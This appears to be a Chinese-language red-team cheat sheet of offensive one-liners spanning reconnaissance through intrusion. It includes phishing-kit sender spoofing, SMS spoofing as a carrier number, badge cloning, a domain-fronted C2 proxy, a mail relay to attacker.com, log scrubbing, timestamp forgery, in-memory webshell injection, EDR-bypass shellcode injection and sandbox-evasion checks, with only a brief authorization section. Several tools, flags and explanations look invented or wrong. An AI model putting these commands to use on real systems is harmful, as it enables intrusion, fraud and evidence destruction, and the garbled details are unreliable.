攻防演练,实战技巧!
一、信息收集基础篇
- 证书透明度日志挖掘
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
原理:通过Certificate Transparency获取历史SSL证书关联域名 - DNS缓存探测攻击
dnsrecon -d target.com -t brt -D subdomains-top1million-5000.txt
效果:利用DNS缓存投毒原理发现未公开子域 - 企业邮箱格式反推员工ID
wget -qO- "https://target.com/owa/autodiscover/autodiscover.xml" | grep 'LegacyDN'
关联技巧:结合LinkedIn姓名生成潜在用户名清单 - 云WAF背后的真实IP探测
nmap -Pn -sS -p 80,443 --script http-waf-detect --script-args="http-waf-detect.aggro" target.com
关键参数:--script-args设置激进检测模式 - 历史解析记录追溯
python3 dnsdumpster.py -d target.com --historical
工具特性:整合多家DNS历史数据库
二、子域名深度挖掘
- 泛解析突破技术
ffuf -w subdomains.txt -u "http://FUZZ.target.com" -H "Host: FUZZ.target.com" -mc 200 -t 50
原理:利用Host头绑定绕过泛解析限制 - NSEC记录遍历
dig +short NSEC target.com @8.8.8.8 | grep -Eo "[a-zA-Z0-9.-]+.target.com"
应用场景:针对启用DNSSEC的域名 - 域名接管漏洞探测
subjack -w subdomains.txt -t 100 -ssl -c fingerprints.json -o vulnerable.txt
检测要点:过期云服务CNAME记录 - 跨域JS文件关联分析
python3 linkfinder.py -i https://cdn.target.com/main.js -o cli
输出结果:提取接口路径与新域名 - 被动DNS聚合查询
amass enum -passive -d target.com -config config.ini
配置文件:集成SecurityTrails/WhoisXML等API
三、端口扫描与协议分析
- 全端口快速测绘
naabu -host target.com -p - -scan-all-ips -rate 1000 -silent
优势:绕过传统扫描器端口范围限制 - 高隐蔽性分布式扫描
masscan 10.0.0.0/8 -p0-65535 --rate 100000 --shard 1/10 -oG output.gnmap
架构:10台服务器分片扫描全国IP段 - 工控协议指纹识别
nmap -sU -p 102 --script s7-info.nse 192.168.1.100
重点协议:Siemens S7、Modbus TCP - 云数据库暴露检测
nmap -p 1433,3306,5432 --script ms-sql-info,mysql-info,pgsql-info 10.0.0.0/24
风险点:公有云默认开放数据库端口 - 私有协议逆向分析
tcpflow -r capture.pcap -e port 9999 | strings -10
方法:提取未知协议特征关键字
四、云资产深度测绘
- AWS S3存储桶枚举
s3scanner scan -bucket-name target -wordlist s3-buckets.txt -region us-west-1
关键命令:--check-permissions检测访问权限 - Azure Blob存储探测
az storage blob list --account-name targetstorage --container-name \$root --query [].name
权限要求:需有效SAS令牌或访问密钥 - 云函数元数据提取
curl http://localhost:9001/2018-06-01/runtime/invocation/next
攻击面:Serverless环境本地调试接口 - Kubernetes服务发现
kubectl get ingress --all-namespaces -o jsonpath='{.items[*].spec.rules[*].host}'
关联资产:Ingress暴露的对外域名 - CDN边缘节点IP反查
python3 censys-search.py "services.http.response.headers.server: Cloudflare" target.com
绕过方法:历史解析记录对比
五、内部网络渗透
- LLMNR/NBNS欺骗监听
responder -I eth0 -dwv --analyze
输出:捕获NetNTLMv2哈希用于破解 - 交换机ARP表提取
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.4.22.1.2
OID:1.3.6.1.2.1.4.22.1.2(ipNetToMedia) - 域控全局编录探测
nmap -p 3268 --script ldap-rootdse 192.168.1.100
特征:通过GC端口获取域架构信息 - 打印机漏洞扫描
python3 PRET.py 192.168.1.200 pdf
利用:通过PostScript语言执行命令 - 无线AP隐蔽嗅探
airodump-ng wlan0mon --essid 'Corp-Guest' -w capture
重点:捕获企业访客网络802.1X握手包
六、隐蔽信息泄露挖掘
- GitHub敏感信息扫描
trufflehog --regex --entropy=False https://github.com/target/repo.git
增强版:自定义关键词规则 - JS地图文件反编译
unwebpack sourcemap.js.map -o src
收获:还原前端加密算法与API密钥 - 错误页面路径泄露
curl -sk "https://target.com/%2e%2e/%2e%2e" | grep "at line"
技巧:通过异常请求触发调试信息 - 备份文件暴力枚举
wfuzz -c -w backup_files.txt -u "http://target.com/FUZZ" --hc 404
字典建议:包含.bak,.swp,.zip等扩展名 - 邮件头MX记录解析
dig +short MX target.com | awk '{print $2}' | xargs -I{} dig +short A {}
关联资产:发现自建邮件服务器IP
七、物联网与边缘设备
- ONVIF摄像头发现
nmap -p 80,443,554 --script onvif-discover 10.0.0.0/24
特征:识别支持ONVIF协议的监控设备 - 路由器固件反编译
binwalk -Me firmware.bin
关键步骤:提取文件系统分析硬编码凭证 - ZigBee设备嗅探
ubertooth-scan -f 2405M -c 11
频率:2.405GHz-2.480GHz信道遍历 - MQTT协议订阅
mosquitto_sub -h broker.target.com -t "#" -v
风险点:未授权访问物联网消息队列 - BACnet楼宇设备扫描
bacnet-discover -i eth0 -d 3
输出:暖通空调、门禁系统等设备列表
八、API接口深度挖掘
- Swagger文档泄露利用
curl -s http://api.target.com/v2/api-docs | jq '.paths | keys[]'
自动化工具:APIFuzzer - GraphQL自省查询
query {__schema{types{name fields{name args{name}}}} 渗透入口:未授权内省功能
- OAuth令牌劫持
mitmproxy -s oauth_poison.py -p 8080
脚本功能:修改回调地址窃取code - WebSocket敏感操作嗅探
wscat -c "ws://target.com/ws" --listen 9000
捕获:实时通信中的凭证与指令 - REST参数FUZZ测试
ffuf -w params.txt -X POST -u "http://api.target.com/user?id=FUZZ" -mr "success"
九、移动应用资产关联
- APK反编译提取域名
apktool d app.apk -o decompiled && grep -rE "https?://[^/\"']+" decompiled/
增强:使用jadx-gui查看逻辑调用链 - iOS IPA文件分析
otool -L Payload/app.app/app | grep "\.dylib"
重点:检查第三方动态库风险 - 应用沙箱数据提取
frida -U -f com.target.app -l dump_storage.js
脚本功能:导出SQLite/SharedPreferences - 证书绑定绕过检测
objection explore -s "android sslpinning disable"
原理:Hook SSL验证函数 - 应用备份文件扫描
adb backup -f backup.ab com.target.app && dd if=backup.ab bs=1 skip=24 | openssl zlib -d
十、代码仓库与文档资产
- Git仓库历史追溯
git log -p --all | grep -E "password|secret|key"
扩展:truffleHog正则表达式深度扫描 - Confluence空间遍历
python3 confluence_export.py -u admin -p pass123 -url http://wiki.target.com -o /dump
数据泄露:内部技术文档与架构图 - JIRA问题搜索利用
curl -u user:pass "https://jira.target.com/rest/api/2/search?jql=text~'credentials'"
JQL语法:筛选敏感信息条目 - 内部Wiki关键词爬取
wget -r -l 5 --accept "*.html" --reject-regex logout http://wiki.target.com
后处理:cewl生成定制字典 - Sharepoint文件遍历
spiderfoot -u https://sharepoint.target.com -m sfp_sharepoint
模块功能:自动映射文档库结构
十一、隐蔽通信与日志分析
- DNS隧道流量识别
tshark -n -r traffic.pcap -Y "dns.qry.name contains .attacker.com" -T fields -e ip.src
检测点:异常长域名查询 - 代理日志关联分析
cat squid.log | awk '{print $3}' | sort | uniq -c | sort -nr
定位:高频访问内部系统的外网IP - Windows事件日志检索
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} | ?{$_.Message -match 'TargetUserName'}
关键事件:成功登录记录 - Linux审计日志分析
ausearch -k http_backdoor | aureport -f -i
监控点:异常文件访问行为 - 数据库慢查询日志挖掘
mysqldumpslow -s t /var/log/mysql/slow.log | grep -E "(SELECT|UPDATE).*WHERE"
价值:发现未索引的敏感字段
十二、第三方服务关联
- 供应商接口测试
curl -H "X-Forwarded-For: 192.168.1.100" https://vendor.target.com/api
绕过:IP白名单校验 - 短信网关漏洞利用
python3 sms_spoof.py -to +8613800138000 -from 10086 -msg "系统升级,验证码:123456"
风险:伪造官方号码发送钓鱼短信 - CDN边缘节点接管
dig +short target.com.cdn.cloudflare.net | xargs -I{} host {}
验证:CNAME记录归属权 - OSS存储桶权限检测
aliyun oss GetBucketAcl oss://target-bucket
权限模型:public-read-write风险最高 - 微信小程序反编译
unveilr -i com.target.miniapp -o decompiled
数据泄露:内网API地址与加密密钥
十三、社会工程学实战
- 钓鱼邮件元数据伪造
python3 phishingkit.py --from "HR <hr@target.com>" --reply-to "hr@real.com" --server smtp.gmail.com --ssl
关键头:设置正确的DKIM/SPF记录规避检测 - 员工通讯录智能生成
theHarvester -d target.com -b google -l 500 | grep "@target.com" | awk '{print $2}' > emails.lst
增强:LinkedIn员工姓名拼接企业邮箱格式 - 二维码钓鱼基站搭建
qrljacker --interface wlan0 --essid "内部WiFi认证" --captive-portal
触发机制:连接后强制跳转钓鱼页面 - 语音钓鱼(Vishing)模拟
asterisk -rx "channel originate SIP/attacker extension 1000@victim-context"
伪装:来电显示修改为内部短号 - 工牌克隆攻击
proxmark3 -c "hf 14a read; hf 14a sim -t 7b"
目标:复制高频RFID门禁卡
十四、物理设备渗透
- 网口镜像流量捕获
tcpdump -i eth0 -w capture.pcap host 192.168.1.100 and port 80
前提:接入交换机配置端口镜像 - HID攻击键盘注入
bash bunny-payload.sh -l posix -c "DELAY 1000 GUI r DELAY 100 STRING cmd ENTER"
设备:使用Bash Bunny执行物理击键 - 隐蔽式PoE供电窃听
thc-ipv6-address6 -i eth0 -a clone
配合:利用PoE供电的树莓派植入 - 打印机NVRAM数据提取
pjl-encoding --host 192.168.1.200 --get-nvram | grep "job.log"
敏感信息:打印任务历史记录 - 智能门锁蓝牙爆破
btlejack -c 37 -t 5C:FB:7A:11:22:33 -o capture.pcap
漏洞:低功耗蓝牙加密强度不足
十五、代码与配置审计
- 硬编码密钥模式匹配
grep -rE "(?i)(password|secret|key|token)\s*[:=]\s*['\"][a-z0-9]{20,}['\"]" /src
正则优化:排除测试环境配置 - CI/CD流水线漏洞
jenkins-jobs --user admin --password-file pass.txt list-all-jobs
敏感操作:获取构建脚本中的凭证 - Dockerfile风险检测
grep -rE "(ADD|COPY)\s.*\.(pem|key|db)" ./dockerfiles
重点:检查敏感文件打包进镜像 - SSH配置弱点扫描
nmap -p22 --script ssh2-enum-algos,ssh-auth-methods 192.168.1.0/24
风险项:支持弱加密算法 - 防火墙规则逆向推导
iptables-save > rules.v4 && cat rules.v4 | grep ACCEPT
分析:暴露的非常用端口
十六、红队基础设施
- 域前置CDN配置
server {
listen 443 ssl;
server_name cdn.target.com;
ssl_certificate /path/real.crt;
location / {
proxy_pass http://c2_server;
proxy_ssl_server_name on;
}
} 检测难点:证书与域名完全匹配
- 动态DNS快速切换
curl "https://api.dynu.com/nic/update?hostname=malicious.ddns.net&myip=$(curl -s ifconfig.me)"
优势:IP快速更换躲避封禁 - 邮件服务器隐蔽中继
postconf -e "relayhost = [attacker.com]:587" && systemctl reload postfix
特征:使用STARTTLS加密中继
十七、日志与痕迹对抗
- 日志实时清洗工具
logcleaner -f /var/log/nginx/access.log -r "192\.168\.1\.1[0-9]{2}" -o clean.log
功能:正则匹配删除攻击IP记录 - 文件防恢复擦除
shred -zun 10 -v confidential.doc
参数说明:-z最后用0覆盖,-u执行后删除 - 时间线伪造工具
touch -r /etc/passwd malicious.sh
参照:复制合法文件时间属性 - 内存执行规避记录
memshell -p tomcat -action inject -cmd "whoami" -no-disk
原理:驻留于Java进程内存
十八、零日漏洞追踪
- GitHub监控自动化
ghmonitor -u target_org -k "password,encrypt,config" -t ghp_xxx
实时推送:关键词关联仓库动态 - 补丁对比漏洞挖掘
diff -r source_patched/ source_original/ | grep "CVE-2023"
重点:分析安全更新代码差异 - 调试接口未授权访问
curl -v http://target.com/actuator/health | jq .status
Spring Boot常见端点:/env, /heapdump - 驱动漏洞扫描
windbg -c "!chkimg nt!NtCreateFile"
检测:内核函数钩子异常
十九、高级网络测绘
- 全网IPv6资产探测
zmap -6 -p 80 --ipv6-target-file=targets.txt -o ipv6_http.csv
前提:需具备IPv6广播地址 - BGP路由劫持检测
bgpstream-parser -c routeviews -t 20230815 | grep "target_asn"
数据源:RouteViews、RIPE RIS - 暗网资产关联
onionScan --url=http://targetmarket.onion --fullscan
关联点:公司邮箱注册的暗网账号 - 卫星通信频段扫描
gnuradio-companion satellite_scanner.grc
硬件要求:USRP设备+抛物面天线
二十、防御体系对抗
- EDR进程注入绕过
injector.exe -p 456 -s shellcode.bin -t IndirectSyscall
技术:直接系统调用+堆加密 - 沙箱环境指纹识别
if ((Get-WmiObject Win32_ComputerSystem).Manufacturer -eq "VMware, Inc.") { exit }
if (Get-Process -Name "vmtoolsd" -ErrorAction SilentlyContinue) { exit } - 硬件虚拟化检测
lscpu | grep Hypervisor
退出策略:存在虚拟化特征时停止攻击 - 流量伪装混淆
stegotorus chop -d 80 -f http -p password -r 192.168.1.1:8080
原理:将C2流量嵌入HTTP头部
二十一、法律与合规边界
- 授权测试范围确认
nmap -sL 192.168.1.0/24 | grep -v "不在范围" > scope.txt
红线:严禁扫描授权外IP段 - 数据脱敏处理
anonip -i pcap.pcap -o anon.pcap -m "192.168.1.0/24->10.0.0.0/24"
要求:报告中的IP全部替换为伪地址 - 渗透测试保险策略
保险范围必须包含:第三方数据泄露责任、应急响应费用
二十二、自动化武器库
- 综合扫描平台搭建
FROM kalilinux/kali-rolling
RUN apt install -y nuclei xray gowitness amass
CMD ["自动化扫描脚本.sh"] - 漏洞POC分级管理
poc-triage --dir ./pocs --severity critical,high --tag target_industry - 攻击链可视化
python3 attack_graph.py -i logs.json -o timeline.html
PS:涉及的工具、脚本较多,具体可根据名称查找,不一一列出。
